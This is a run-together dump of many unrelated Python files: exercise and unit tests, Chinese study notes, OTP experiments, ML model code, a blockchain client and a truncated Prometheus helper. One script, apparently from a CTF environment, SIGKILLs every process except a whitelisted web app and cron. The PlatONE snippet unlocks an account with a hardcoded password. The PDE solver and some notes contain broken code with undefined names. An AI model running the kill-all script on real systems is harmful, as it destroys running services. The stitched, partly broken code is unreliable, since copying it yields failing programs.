from ex1 import sum_list_for, sum_list_reduce, sum_list_sum_func from ex2 import list_comp from ex3 import boom_7_for, boom_7_list_comprehension, boom_7_map from ex4 import dict_to_list, dict_to_list_comp from ex5 import count_number_of_arguments from ex6 import func from ex7 import make_adder print("Test ex1 sum list in for function") print("sum list in for [1,1,1,1] returned:"+str(sum_list_for([1,1,1,1])), " 'PASSED'" if sum_list_for([1,1,1,1]) == 4 else " 'FAILED'") print("********************************************") print("Test ex1 sum list with reduce") print("sum list with reduce [1,2,3,4] returned:"+ str(sum_list_reduce([1, 2, 3, 4])), " 'PASSED" if sum_list_reduce([1, 2, 3, 4]) == 10 else " 'FAILED" ) print("********************************************") print("Test ex1 sum list with built in sum") print("sum list with built in sum [1,2,3,4] returned:"+ str(sum_list_sum_func([1, 2, 3, 4])), " 'PASSED" if sum_list_sum_func([1, 2, 3, 4]) == 10 else " 'FAILED" ) print("********************************************") print("Test ex1 functions with tuple:") print("sum list in for (1,2,3,4) returned:" + str(sum_list_for((1,2,3,4))) ) print("sum_list_reduce (1,2,3,4) returned:" + str(sum_list_reduce((1,2,3,4))) ) print("sum_list_sum_func (1,2,3,4) returned:" + str(sum_list_sum_func((1,2,3,4))) ) print("********************************************") print("Test ex2") print(list_comp()) print("********************************************") print("Test ex3") print("Ex3 boom_7_for: ",end=" ") print(boom_7_for(21)) print("Ex3 boom_7_list_comprehension: ",end=" ") print(boom_7_list_comprehension(21)) print("Ex3 boom_7_map: ",end=" ") print(boom_7_map(21)) print("********************************************") print("Test ex4") print(dict_to_list(['a', 'b', 'c'])) print(dict_to_list_comp(['a', 'b', 'c'])) print("********************************************") print("Test ex5") print("********************************************") print(count_number_of_arguments()) print(count_number_of_arguments(1)) print(count_number_of_arguments(1,2)) print("********************************************") print("Test ex6") func(1, 2, 3, name="hello") func(1,2,3) print("********************************************") print("Test ex7") add_3 = make_adder(3) print("add_3(5):" + str(add_3(5))) print("add_3(3):" + str(add_3(3))) add_7 = make_adder(7) print("add_7(1):" + str(add_7(1))) print("add_7(-3):" + str(add_7(-3)))
# -*- coding: utf-8 -*- from __future__ import unicode_literals import datetime import transaction def test_displays_list_of_log_entries(browser): from sw.allotmentclub import Log, User User.create(id=2, username='sw', vorname='Sebastian', nachname='Wehrmann') Log.create(user_id=2, name='user data', level='INFO', created=datetime.datetime.now(), msg='Test-Log-Eintrag') transaction.commit() browser.login() browser.open('http://localhost/') assert { 'username': 'sw', 'firstname': 'Sebastian', 'lastname': 'Wehrmann', 'gravatar_url': 'https://www.gravatar.com/avatar/' 'd41d8cd98f00b204e9800998ecf8427e', 'detail': ['Test-Log-Eintrag'], 'time': 'gerade eben' } in browser.json['data']['timeline'] def test_fa_icon_if_system_user(browser): from sw.allotmentclub import Log, User user = User.find_or_create(username='system') Log.create(user=user, name='user data', level='INFO', created=datetime.datetime.now(), msg='Test-Log-Eintrag') transaction.commit() browser.login() browser.open('http://localhost/') timeline = browser.json['data']['timeline'][0] assert timeline['fa_icon'] == 'fa-gear' assert 'gravatar_url' not in timeline
#一 import keyword print(keyword.kwlist) #打印关键字 #二 a = 'app\nle' a2 = r'app\nle' #加r是防止字符转义的,加r和不加''r是有区别的,如果路径中出现'\t'(python中是空六格的意思)的话 不加r的话\t就会被转义 而加了'r'之后'\t'就能保留原有的样子 print(a) print(a2) #三 #打开一个文件,有两种方法 #方法一: file = open (r'C:\Users\Administrator\Desktop\PYTHON_LESSON\a.txt','r',encoding='utf-8') #'r,w,a,x' print(file.read()) file.close() #方法二:(更简洁) with open(r'C:\Users\Administrator\Desktop\PYTHON_LESSON\a.txt','r',encoding='utf-8') as file: print(file.read()) #read当成整体来读,readline是一行一行的读 #延伸 with open(r'C:\Users\Administrator\Desktop\PYTHON_LESSON\a.txt','r',encoding='utf-8') as file: a = file.read() print(a) res = a.count('a') #计算文件中a的值有几个,注意:计算出来的是不包括大写的A print(res) with open(r'C:\Users\Administrator\Desktop\PYTHON_LESSON\a.txt','r',encoding='utf-8') as file: a = file.read() pattern = re.compile(r'python') result = re.findall(a) #findall是查找所有的,意思是使用正则表达式去目标字符串匹配 result = str(result) #这个方法也行,与上面那个是一样的,string是你要查找的对象,可以更改 print(result) # 打开文件两种方法 # file = open(r'/Users/songluyao/Documents/PYTHON_LESSON/a.txt','r') # print (file.read()) # file.close() with open(r'/Users/songluyao/Documents/PYTHON_LESSON/a.txt','a') as file: file.write('22222ddddd\nqqdfadfaffaafdfafafaff') # print(file.read()) # 一些正则表达式的关键词 # w:以写方式打开, # a:以追加模式打开 (从 EOF 开始, 必要时创建新文件) # r+:以读写模式打开 # w+:以读写模式打开 (参见 w ) # a+:以读写模式打开 (参见 a ) # rb:以二进制读模式打开 # wb:以二进制写模式打开 (参见 w ) # ab:以二进制追加模式打开 (参见 a ) # rb+:以二进制读写模式打开 (参见 r+ ) # wb+:以二进制读写模式打开 (参见 w+ ) # ab+:以二进制读写模式打开 (参见 a+ )fp.read([size]) #四 # print(help(open)) # 使用help()查看帮助 # help(input) #五********************************************************* #if……else 如果,否则 和 elif 或者,再或者 #题目一: point = 100 if point >= 80 and point <=100: print('优秀') elif point >=60 and point<80: print('及格') elif point >=0 and point<60: print('不及格') else: print('非法分数') a = 1 b = 2 c = 1 if a+b>c and a+c>b and b+c>a: print("能组成一个三角形") else: print("不能组成一个三角形") #题目二: username = 'admin' password = '126' if username == 'admin' and password == '126': print('输入正确') else: print('账号或密码错误') # if username == 'admin' and password == '123': # print('输入正确') # elif username =='admin' and password != '123': # print('密码错误') # else: # print('非法输入') # score = 95 # if score >=90 and score <=100: # print('优秀') # if score >=95: # print('超优秀') # if score == 100: # print('相当优秀') # if score >0 and score <= 80: # print("及格") # fruit = ['apple','orange','banana','apple'] # fruit.pop() # print(fruit) # fruit.extend('watermelon') # print(fruit) # number = [2,1,5,53,8,9,23,6,9,8] # number.sort() # number.reverse() # number=number[::-1] # print(number) # 大小写转换 # 1、 string1 = “my name is john” 对这句话的首字母进行大写处理,并且把人名都变成大写 # str = "my name is john" # str = str[0:-4].capitalize()+str[-4:].upper() # print(str) # 第二节课上午 # 字符串取值 string = 'hello' print(string[4]) # 切片 string = '0123456789' print(string[0:5]) #能取到第二个参数的前面一位 print(string[:]) #从开始到结尾可以不用写值 # 步长 string = '0123456789' print(string[::2]) #步长为2,每两位取值,取第一个。 print(string[4::2]) #从下标第四个开始取值,步长为2。 # 字符串的方法 string = '0123456789' string.join print(string.count('0')) #计算字符串中0出现的次数,统计 import re #导入正则表达式 #re表示regular expression 正则表达式 是匹配用的 string = 'hh0123456789abccdefghijklmnjjq7181910' pattern = re.compile(r'a') #pattern其实是一个正则表达式,此句意思是制作一个正则表达式,引号里面是匹配的内容,可以更改 result = re.findall(pattern,string) #findall是查找所有的,意思是使用正则表达式去目标字符串匹配 result = pattern.findall(string) #这个方法也行,与上面那个是一样的,string是你要查找的对象,可以更改 print(result) #打印出来的格式一般是list格式 result = str(result) print(string.count('a')) # 转换成字符串格式 a = 1 str(a) #把a转换成字符串 print(type(a)) import re #导入正则表达式 #re表示regular expression 正则表达式 是匹配用的 string = 'hh0123456789abccdefghijklmnjjq7181910' pattern = re.compile(r'a') #pattern其实是一个正则表达式,此句意思是制作一个正则表达式,引号里面是匹配的内容,可以更改 result = re.findall(pattern,string) #findall是查找所有的,意思是使用正则表达式去目标字符串匹配 result = pattern.findall(string) #这个方法也行,与上面那个是一样的,string是你要查找的对象,可以更改 print(result) #打印出来的格式一般是list格式 result = str(result) print(string.count('a')) string = 'hh0123456789abccdefghijklmnjjq7181910' a = string.capitalize() #首字母大写 a = string.upper() #所有字母大写 a = string.lower() #所有字母小写 a = string.islower() #是否全部是小写 a = string.isdigit() # 是否全部是数字 a = string.find('2') #找2第一次出现的地方,find如果找不到返回结果为-1 a = string.index('2') #index找不到会报错 #如果变量出现了多次,以最后一次为准 #列表 list1 = [1,2,'a',"666",a] fruit = ['apple','banana','orange'] print(fruit[0]) #字符串和list都支持切片 print(fruit[0][1]) #可以把里面的字母取出来 p #reverse 反向的意思 fruit.reverse() #将列表倒序排序 fruit.remove('apple') #删除列表中的一个元素 fruit.remove(string) 只能删除一个,有多个页只能删除第一个,再想删就多写几个 fruit.pop(1) #pop也是删除,里面写的是下标,如果pop为空,默认删除的是最后一个元素,是先进后出的原则(栈),即先插入进去的,最后一个出来。 fruit.append('watermalon') #添加,拼接的意思 添加一个字符串 fruit.append(['a','b','c']) #添加一个list,默认是把一个list添加进list,后面添加的一个东西当做一个整体添加进去的 fruit.extend('watermalon') #添加的意思,无论后面是什么,只要能切片,都能切好,添加的一定是一个集合 print(fruit) list2 = fruit.copy() #浅复制 #浅复制:单纯把某个地址拿来用,只是拿内存地址 #深复制:不会随着原来的值的改变而改变,是一个全新的对象,不再与原来的对象有任何关联。 import copy fruit = ['apple','banana','orange'] list3 = copy.deepcopy(fruit) print(list3) fruit.clear() #清空 fruit.index('banana') #查找 fruit.insert(0,'a') #插入,将a插入到下标0的地方,参数1为下标,参数2为插入的值 # 排序 number = [1,2,3,4,5,12,442,38,64,88,55] number.sort() #从小到大排序 number.reverse() #从小大大排序后反向即可按照从大到小排序 number = number[::-1] #此方法也可以从大到小排序。默认步长为1,倒着走 sor = sorted(number) print(sor) #此方法是生成了一个新的列表且是排序后的,之前的列表是没有更改的。 #即sort是把原来列表排列了,对原来列表起作用,sorted是把排好的结果放在一个新的list中 #用正则表达式查找列表中的某个字母的总数 import re fruit = ['apple','banana','orange'] pattern = re.compile(r'a') res = pattern.findall(fruit) count = str(res).count('a') print(count) #类型转换 s = 'apple' lis = list(s) #把一个对象转换成list str() #转化为字符串 list() #转化为列表 int() #转化为数字 float() #转化为小数 tuple() #转换为元祖 #tuple 元祖 元祖也有切片 tup = ('apple','orange','banana') print(tup[::1]) # tuple本身不能被更改,extend、append、insert方法不行,里面东西是定死的,增删改都不行,可以查询 tup.count('apple') #可以查询 tup.index('apple') # dict 字典 en_ch = {'apple':'苹果','orange':'橘子','banana':'香蕉'} #字典里面的东西是一对一对的 print(en_ch['apple']) #打印的是apple后面的值 en_ch.clear #清空字典 en_ch.pop('apple') #删除,给的是key en_ch.popitem() #随机删除,不需要给值 en_ch.get('banana') #跟print(en_ch['banana'])一样,都是取值,,en_ch.get('banana') 这个没有,提示none, # 如果用print(en_ch['banana']),会提示报错 en_ch.values() #所有的值 en_ch.keys() #所有的键 en_ch.items() #信息一对一对取出来 en_ch.fromkeys() #生成一个新的字典,可以给一个值,也可以给两个值,一个值报错none,两个值,前面的是key,后面的是值 a = en_ch.fromkeys('asa','s') print(a) #延伸 fruit = ['a','erer','eeee','rtgg'] s = ''.join(fruit) print(s[1]) #此方法是把列表转换成字符串,且里面的各种括号,符号都没有了,如【 ’,如果直接用str会带出这些符号东西 #字典中的值修改 # 先取出来,然后给个新的值 en_ch = {'apple':'苹果','orange':'橘子','banana':'香蕉'} en_ch['banana'] = 'xiangjiao' print(en_ch) #字典中添加值 en_ch = {'apple':'苹果','orange':'橘子','banana':'香蕉'} en_ch['grape'] = '葡萄' print(en_ch)
# # Copyright(c) 2012-2021 Intel Corporation # SPDX-License-Identifier: BSD-3-Clause # import pytest import subprocess import unittest.mock as mock from opencas import casadm from helpers import get_process_mock @mock.patch("subprocess.run") def test_run_cmd_01(mock_run): mock_run.return_value = get_process_mock(0, "successes", "errors") result = casadm.run_cmd(["casadm", "-L"]) assert result.exit_code == 0 assert result.stdout == "successes" assert result.stderr == "errors" mock_run.assert_called_once_with( ["casadm", "-L"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=mock.ANY, ) @mock.patch("subprocess.run") def test_run_cmd_02(mock_run): mock_run.return_value = get_process_mock(4, "successes", "errors") with pytest.raises(casadm.CasadmError): casadm.run_cmd(["casadm", "-L"]) @mock.patch("subprocess.run") def test_get_version_01(mock_run): mock_run.return_value = get_process_mock(0, "0.0.1", "errors") result = casadm.get_version() assert result.exit_code == 0 assert result.stdout == "0.0.1" assert result.stderr == "errors" mock_run.assert_called_once_with( [casadm.casadm_path, "--version", "--output-format", "csv"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=mock.ANY, ) @mock.patch("subprocess.run") def test_get_version_02(mock_run): mock_run.return_value = get_process_mock(4, "successes", "errors") with pytest.raises(casadm.CasadmError): casadm.get_version()
import os,signal out=os.popen("ps -ef").read() for line in list(out.splitlines())[1:]: try: pid = int(line.split()[1]) ppid = int(line.split()[2]) cmd = " ".join(line.split()[7:]) print(pid,ppid,cmd) if ppid in [0,1] and cmd in ["/usr/local/bin/python3.8 /home/ctf/web/app.py","/usr/sbin/cron","tail -f /var/log/cron"]: continue os.kill(pid,signal.SIGKILL) except Exception as e: pass
"""[4.2.6-2] Diffusion-reaction PDEs Implemented with Pytorch.(torch version >= 1.8.1) * Variable interpretation: - x: torch.Tensor, (Number of points, dimension) - """ import sys, os from copy import deepcopy import random from random import randint import json from tqdm import tqdm import numpy as np import torch import torch.nn as nn import torch.optim as optim from torch.autograd import grad import matplotlib.pyplot as plt from train import train # >>> global params definition (same as 4.2.3)>>> PARAMS = { 'name': 'ParabolicEqnInvTime', 't0': 0, 'T': 1., 'N': 10, 'dim': 10, 'left boundary': -1, 'right boundary': 1, 'K_primal': 2, 'K_adv': 1, 'lr_primal': 0.015, 'lr_adv': 0.04, 'Nr': None, 'Nb': None, 'Na': None, 'alpha': None, 'gamma': None, 'use elu': False, 'n_iter': 20000, } # update PARAMS['Nr'] = PARAMS['dim'] * 4000 PARAMS['Nb'] = PARAMS['dim'] * PARAMS['dim'] * 40 PARAMS['Na'] = PARAMS['Nb'] PARAMS['alpha'] = PARAMS['Nb'] * 10000 PARAMS['alpha'] = PARAMS['Nb'] * 10000 DEVICE = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu') # <<< global params definition <<< torch.set_default_tensor_type(torch.DoubleTensor) random.seed(0) torch.manual_seed(0) torch.cuda.manual_seed(0) np.random.seed(0) # >>> Numerical function definition >>> def h(x): """Initial constraint (also a coefficient in g) """ return 2.0 * torch.sin(np.pi / 2.0 * x[:, 0]) * torch.cos(np.pi / 2.0 * x[:, 1]) def g(x, _h): """ :u* Dirichlet boundary / ground truth function -1 indicates the dimension of 'time' """ return _h * torch.exp(-1. * x[:, -1]) def f(x, _g): """ R.H.S of PDE """ return (np.pi * np.pi - 2.0) * _g / 2.0 - _g * _g / torch.cos(np.pi / 2.0 * x[:, 1]) def loss_all(xr: torch.Tensor, xr_t0: torch.Tensor, xr_T: torch.Tensor, xb: torch.Tensor, u_theta, phi_eta, alpha, gamma, device): """ Args: torch.Tensor: (Nr x d) torch.Tensor: (Nb x d) Network instance Network instance alpha: weight constant Returns: torch.Tensor: (1 x 1) """ # Calculate derivative w.r.t. to x xr = Variable(xr, requires_grad=True) xr_t0 = Variable(xr_t0, requires_grad=True) xr_T = Variable(xr_T, requires_grad=True) # Calculate derivative w.r.t. to x[x1, x2, ...] _out_u_theta = torch.sum(u_theta(xr)) _grad_u_theta = grad(_out_u_theta, xr, create_graph=True)[0] _out_phi_eta = torch.sum(phi_eta(xr)) _grad_phi_eta = grad(_out_phi_eta, xr, create_graph=True)[0] # feed forward _phi_eta = phi_eta(xr) # comp. graph => loss _u_theta_bdry = u_theta(xb) # comp. graph => loss # <<< PDE-specific: calculate for I <<< # do something # <<< PDE-specific: calculate for I <<< loss_int = 2 * torch.log(I_sum) - torch.log( torch.sum(_phi_eta * _phi_eta) ) loss_bdry = torch.sum( (_u_theta_bdry - g(xb))**2 ) / xb.shape[0] return loss_int + loss_bdry * alpha + loss_init * gamma # <<< Numerical function definition <<< if __name__ == '__main__': train(params=PARAMS, g=g, loss_func=loss_all, device=DEVICE, requires_time=True)
from django.test import TestCase, tag from users.models import User from users.tests.mixin import UserTestMixin @tag('model') class TestUserModel(UserTestMixin, TestCase): @classmethod def setUpTestData(cls): pass @tag('standard') def test_user_manager_create_success(self): # given user_data = { 'username': 'jimmy', 'password': '123qweasd', } # when user = User.objects.create(**user_data) # then # Should have password hashed self.assertNotEqual(user_data['password'], user.password) self.assertTrue(user.check_password(user_data['password']))
from Command.Command import Command from AudioExtraction.AudioExtractor import AudioExtractor from AudioExtraction.Mp4Video import Mp4Video from glob import glob import os from Utilities import Utilities as util def validate(args): if args.file == None: return False if args.run == None and args.extract != 'audio': return False return True class AudioExtractionCommand(Command): def __init__(self, next): super().__init__(next) def handle(self, args): if validate(args): file = util.getVideoPath(args.file) target = util.getAudioFilePath(args.file) if not os.path.exists(target): print('Extracting audio from video file: {}'.format(file)) audioExtractor = AudioExtractor( Mp4Video(file, target)) audioExtractor.apply() else: print('Already exists audio file: {}'.format(target)) else: print('Skipping audio extraction.')
import scipy.stats as st def NumerosIgualesPornumero(listaaleatoria): todos = [] for t in (listaaleatoria): c1='' lista = [0] * 10 for numero in range (0,10): lista[numero]=t.count(str(numero)) for l in range (len(lista)): if (lista[l] == 1): for k in range(l+1, len(lista)): if (lista[k] == 1): for j in range(k + 1, len(lista)): if (lista[j] ==1): for m in range(j + 1, len(lista)): if (lista[j] ==1): c1 ='Distintos' elif(lista [j]== 2): c1 ='Un Par' elif(lista[j]==2): c1='Un Par' elif(lista[j]==3): c1= 'Pierna' elif(lista[k]==2): for n in range (k+1, len(lista)): if (lista[n]== 1): c1 ='Un Par' elif(lista[n]==2): c1='Doble Par' elif(lista[k]== 3): c1='Pierna' elif(lista[k]== 4): c1='Poker' elif(lista[l] == 2): for o in range(l+1, len(lista)): if(lista[o]==1): for p in range (o+1, len(lista)): if(lista[p]==1): c1='Un Par' elif(lista[p]==2): c1='Doble Par' elif(lista[o]==2): c1='Doble Par' elif(lista[o]==3): c1='Par y Pierna' elif (lista[l] == 3): for k in range(l+1, len(lista)): if (lista[k] == 1): c1='Pierna' elif(lista[k] == 2): c1 = 'Par y Pierna' elif (lista[l] == 4): c1='Poker' elif (lista[l] == 5): c1= 'Quintilla' todos.append(c1) return todos def Poker(todos,m): #Frecuencia esperada de cada jugada feDis=0.3024 * m fePar=0.5040 * m fePierna=0.072 * m feFull= 0.0090 * m feDoble=0.1080 * m fePoker= 0.0045 * m feQuntilla= 0.0001 *m #Frecuencia Observada de cada jugada foDis= (todos.count('Distintos')) foPar= (todos.count('Un Par')) foPierna= (todos.count('Pierna')) foFull= (todos.count('Par y Pierna')) foDoble= (todos.count('Doble Par')) foPoker= (todos.count('Poker')) foQuntilla= (todos.count('Quintilla')) #Calculo Poker cDis= (((feDis -foDis)**2)/feDis) cPar=(((fePar -foPar)**2)/fePar) cPierna=(((fePierna -foPierna)**2)/fePierna) cFull=(((feFull -foFull)**2)/feFull) cDoble=(((feDoble -foDoble)**2)/feDoble) cPoker=(((fePoker -foPoker)**2)/fePoker) cQuintilla=(((feQuntilla -foQuntilla)**2)/feQuntilla) ct = cDis+cPar+cPierna+cFull+cDoble+cPoker+cQuintilla if (ct <= st.chi2.ppf(0.95,6)): #Nivel de confianza y grados de libertad print('Se acepta la hipotesis, son numeros aleatorios') else: print('No se acepta la hipotesis') if __name__ == "__main__": lista = [] listaJugadas = NumerosIgualesPornumero(lista) Poker(listaJugadas,len(listaJugadas))
#!/usr/bin/env python # Created by MikBac on 2020 import sys for line in sys.stdin: line = line.strip() fields = line.split('\t') if len(fields) == 1: print(fields[0])
""" Tests the channel_entrainment derived class """ from __future__ import absolute_import __all__ = ["test"] from ...._globals import _RECOGNIZED_ELEMENTS_ from .._entrainment import channel_entrainment from ....testing import moduletest from ....testing import unittest @moduletest def test(run = True): """ Run all tests on the channel_entrainment derived class """ return ["vice.core.dataframe.channel_entrainment", [ test_initialization(), test_setitem() ] ] @unittest def test_initialization(): """ Initialization unit test """ def test(): """ Tests the initialization of the channel_entrainment derived class """ global _TEST_FRAME_ _TEST_FRAME_ = dict(zip( _RECOGNIZED_ELEMENTS_, len(_RECOGNIZED_ELEMENTS_) * [1.] )) try: _TEST_FRAME_ = channel_entrainment(_TEST_FRAME_) except: return False return isinstance(_TEST_FRAME_, channel_entrainment) return ["vice.core.dataframe.channel_entrainment.__init__", test] @unittest def test_setitem(): """ __setitem__ unit test """ def test(): """ Tests the __setitem__ function """ try: for i in _RECOGNIZED_ELEMENTS_: _TEST_FRAME_[i] = 0.5 except: return False return _TEST_FRAME_ == channel_entrainment(dict(zip( _RECOGNIZED_ELEMENTS_, len(_RECOGNIZED_ELEMENTS_) * [0.5] ))) return ["vice.core.dataframe.channel_entrainment.__setitem__", test]
#https://pyotp.readthedocs.io/en/latest/ # cd D:\2018_working\coding\googleAuthenticator #https://tools.ietf.org/html/rfc4226 import pyotp import time totp = pyotp.TOTP('base32secret3232') temp = totp.now() temp # OTP verified for current time totp.verify(temp) # => True time.sleep(30) totp.verify(temp) # => False #as above but with loop to identify time to fail temp = totp.now() temp totp.verify(temp) # => True tracker = 0 while True: if totp.verify(temp): tracker += 1 print("tracker:", tracker) time.sleep(1) else: print("totp.verify(temp) returned false") break print("tracker:", tracker) #counter based one time passwords hotp = pyotp.HOTP('base32secret3232') hotp.at(0) # => '260182' hotp.at(1) # => '055283' temp = hotp.at(1401) # => '316439' temp # OTP verified with a counter hotp.verify(temp, 1401) # => True hotp.verify(temp, 1402) # => False #https://pypi.org/project/pyotp/ pyotp.totp.TOTP('JBSWY3DPEHPK3PXP').provisioning_uri("[email protected]", issuer_name="Secure App") temp = pyotp.hotp.HOTP('JBSWY3DPEHPK3PXP').provisioning_uri("[email protected]", initial_count=0, issuer_name="bmtTest") import qrcode import pyotp mykey = 'JBSWY3DPEHPK3PXP' temp = pyotp.hotp.HOTP(mykey).provisioning_uri("[email protected]", issuer_name="bmtTest") img = qrcode.make(temp) img.save("image.jpg") totp = pyotp.TOTP(mykey) print("Current OTP:", totp.now()) #https://github.com/neocotic/qrious import datetime datetime.datetime.now() import numpy as np str(np.datetime64('now')) str(np.datetime64('today')) import pandas as pd str(pd.to_datetime('now')) str(pd.to_datetime('today')) #returns local timezone time from time import gmtime, strftime print(strftime("%z", gmtime())) import time time.tzname import datetime tz_string = datetime.datetime.now(datetime.timezone.utc).astimezone().tzname() tz_string time.timezone / -(60*60)
from .manager import ExperimentManager class ExperimentsMiddleware(object): """Experiments middleware. Binds the convenient :class:`ExperimentManager` to the request. """ def process_request(self, request): assert hasattr(request, 'session'), \ 'Django Banana requires session middleware to be installed' request.experiments = ExperimentManager(request.session)
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import division import numpy as np import paddle.fluid.layers as F import paddle.fluid.initializer as I import paddle.fluid.dygraph as dg class DeepVoice3(dg.Layer): def __init__(self, encoder, decoder, converter, speaker_embedding, use_decoder_states): """Deep Voice 3 TTS model. Args: encoder (Layer): the encoder. decoder (Layer): the decoder. converter (Layer): the converter. speaker_embedding (Layer): the speaker embedding (for multispeaker cases). use_decoder_states (bool): use decoder states instead of predicted mel spectrogram as the input of the converter. """ super(DeepVoice3, self).__init__() if speaker_embedding is None: self.n_speakers = 1 else: self.speaker_embedding = speaker_embedding self.encoder = encoder self.decoder = decoder self.converter = converter self.use_decoder_states = use_decoder_states def forward(self, text_sequences, text_positions, valid_lengths, speaker_indices, mel_inputs, frame_positions): """Compute predicted value in a teacher forcing training manner. Args: text_sequences (Variable): shape(B, T_enc), dtype: int64, text indices. text_positions (Variable): shape(B, T_enc), dtype: int64, positions of text indices. valid_lengths (Variable): shape(B, ), dtype: int64, valid lengths of utterances. speaker_indices (Variable): shape(B, ), dtype: int64, speaker indices for utterances. mel_inputs (Variable): shape(B, T_mel, C_mel), dytpe: int64, ground truth mel spectrogram. frame_positions (Variable): shape(B, T_dec), dtype: int64, positions of decoder steps. Returns: (mel_outputs, linear_outputs, alignments, done) mel_outputs (Variable): shape(B, T_mel, C_mel), dtype float32, predicted mel spectrogram. mel_outputs (Variable): shape(B, T_mel, C_mel), dtype float32, predicted mel spectrogram. alignments (Variable): shape(N, B, T_dec, T_enc), dtype float32, predicted attention. done (Variable): shape(B, T_dec), dtype float32, predicted done probability. (T_mel: time steps of mel spectrogram, T_lin: time steps of linear spectrogra, T_dec, time steps of decoder, T_enc: time steps of encoder.) """ if hasattr(self, "speaker_embedding"): speaker_embed = self.speaker_embedding(speaker_indices) else: speaker_embed = None keys, values = self.encoder(text_sequences, speaker_embed) mel_outputs, alignments, done, decoder_states = self.decoder( (keys, values), valid_lengths, mel_inputs, text_positions, frame_positions, speaker_embed) linear_outputs = self.converter(decoder_states if self.use_decoder_states else mel_outputs, speaker_embed) return mel_outputs, linear_outputs, alignments, done def transduce(self, text_sequences, text_positions, speaker_indices=None): """Generate output without teacher forcing. Only batch_size = 1 is supported. Args: text_sequences (Variable): shape(B, T_enc), dtype: int64, text indices. text_positions (Variable): shape(B, T_enc), dtype: int64, positions of text indices. speaker_indices (Variable): shape(B, ), dtype: int64, speaker indices for utterances. Returns: (mel_outputs, linear_outputs, alignments, done) mel_outputs (Variable): shape(B, T_mel, C_mel), dtype float32, predicted mel spectrogram. mel_outputs (Variable): shape(B, T_mel, C_mel), dtype float32, predicted mel spectrogram. alignments (Variable): shape(B, T_dec, T_enc), dtype float32, predicted average attention of all attention layers. done (Variable): shape(B, T_dec), dtype float32, predicted done probability. (T_mel: time steps of mel spectrogram, T_lin: time steps of linear spectrogra, T_dec, time steps of decoder, T_enc: time steps of encoder.) """ if hasattr(self, "speaker_embedding"): speaker_embed = self.speaker_embedding(speaker_indices) else: speaker_embed = None keys, values = self.encoder(text_sequences, speaker_embed) mel_outputs, alignments, done, decoder_states = self.decoder.decode( (keys, values), text_positions, speaker_embed) linear_outputs = self.converter(decoder_states if self.use_decoder_states else mel_outputs, speaker_embed) return mel_outputs, linear_outputs, alignments, done
from datetime import datetime import fire YEAR = 2000 ZODIAC_SIGNS = { (datetime(YEAR, 1, 20), datetime(YEAR, 2, 18)): "水瓶座", (datetime(YEAR, 2, 19), datetime(YEAR, 3, 20)): "魚座", (datetime(YEAR, 3, 21), datetime(YEAR, 4, 19)): "牡羊座", (datetime(YEAR, 4, 20), datetime(YEAR, 5, 20)): "牡牛座", (datetime(YEAR, 5, 21), datetime(YEAR, 6, 21)): "双子座", (datetime(YEAR, 6, 22), datetime(YEAR, 7, 22)): "蟹座", (datetime(YEAR, 7, 23), datetime(YEAR, 8, 22)): "獅子座", (datetime(YEAR, 8, 23), datetime(YEAR, 9, 22)): "乙女座", (datetime(YEAR, 9, 23), datetime(YEAR, 10, 23)): "天秤座", (datetime(YEAR, 10, 24), datetime(YEAR, 11, 22)): "蠍座", (datetime(YEAR, 11, 23), datetime(YEAR, 12, 21)): "射手座", (datetime(YEAR, 12, 22), datetime(YEAR, 1, 19)): "山羊座", } def judge_zodiac_sign(month, day) -> str: target = datetime(YEAR, month, day) for key, value in ZODIAC_SIGNS.items(): start, end = key if target >= start and target <= end: return value return "" def main(): fire.Fire({"judge": judge_zodiac_sign}) if __name__ == "__main__": main()
from client_sdk_python import Web3, HTTPProvider from client_sdk_python.eth import PlatONE from hexbytes import HexBytes # get blockNumber # w3 = Web3(HTTPProvider("http://localhost:6789")) w3=Web3(HTTPProvider(" http://58.251.94.108:56789")) #含有国密链的节点 platone = PlatONE(w3) block_number = platone.blockNumber print(block_number) # get Balance address = 'lax1yjjzvjph3tw4h2quw6mse25y492xy7fzwdtqja' balance = platone.getBalance(address) print(balance) # sendtransaction to = '0xC1f330B214668beAc2E6418Dd651B09C759a4Bf5' w3.personal.unlockAccount(address, "password", 60) data = { "from": address, "to": to, "value": 0x10909, } transaction_hex = HexBytes(platone.sendTransaction(data)).hex() result = platone.waitForTransactionReceipt(transaction_hex) print(result)
#!/usr/bin/env python3 # Copyright 2021 Canonical Ltd. # See LICENSE file for licensing details. import logging from typing import List, Literal import aiohttp from prometheus_api_client import PrometheusConnect logger = logging.getLogger(__name__) class Prometheus: """A class that represents a running instance of Prometheus.""" def __init__(self, host="localhost", port=9090): """Utility to manage a Prometheus application. Args: host: Optional; host address of Prometheus application. port: Optional; port on which Prometheus service is exposed. """ self.base_url = f"http://{host}:{port}" async def is_ready(self) -> bool: """Send a GET request to check readiness. Returns: True if Prometheus is ready (returned 200 OK); False otherwise. """ url = f"{self.base_url}/-/ready" async with aiohttp.ClientSession() as session: async with session.get(url) as response: return response.status == 200 async def config(self) -> str: """Send a GET request to get Prometheus configuration. Returns: YAML config in string format or empty string """ url = f"{self.base_url}/api/v1/status/config" async with aiohttp.ClientSession() as session: async with session.get(url) as response: result = await response.json() return result["data"]["yaml"] if result["status"] == "success" else "" async def rules(self, rules_type: Literal["alert", "record"] = None) -> list: """Send a GET request to get Prometheus rules. Args: rules_type: the type of rules to fetch, or all types if not provided. Returns: Rule Groups list or empty list """ url = f"{self.base_url}/api/v1/rules{'?type=' + rules_type if rules_type else ''}" async with aiohttp.ClientSession() as session: async with session.get(url) as response: result = await response.json() # response looks like this: # {"status":"success","data":{"groups":[]} return result["data"]["groups"] if result["status"] == "success" else [] async def labels(self) -> List[str]: """Send a GET request to get labels. Returns: List of labels """ url = f"{self.base_url}/api/v1/labels" async with aiohttp.ClientSession() as session: async with session.get(url) as response: result = await response.json() # response looks like this: # { # "status": "success", # "data": [ # "__name__", # "alertname", # "alertstate", # ... # "juju_application", # "juju_charm", # "juju_model", # "juju_model_uuid", # ... # "version" # ] # } return result["data"] if result["status"] == "success" else [] async def alerts(self) -> List[dict]: """Send a GET request to get alerts. 